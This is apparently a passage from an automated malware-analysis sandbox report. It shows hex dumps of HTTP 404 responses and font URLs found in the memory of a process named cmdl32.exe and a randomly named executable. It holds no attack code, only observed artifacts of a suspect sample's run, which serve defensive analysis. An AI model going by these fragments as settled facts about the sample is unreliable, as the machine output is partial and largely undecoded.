b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:24:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:24:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:26:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:26:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
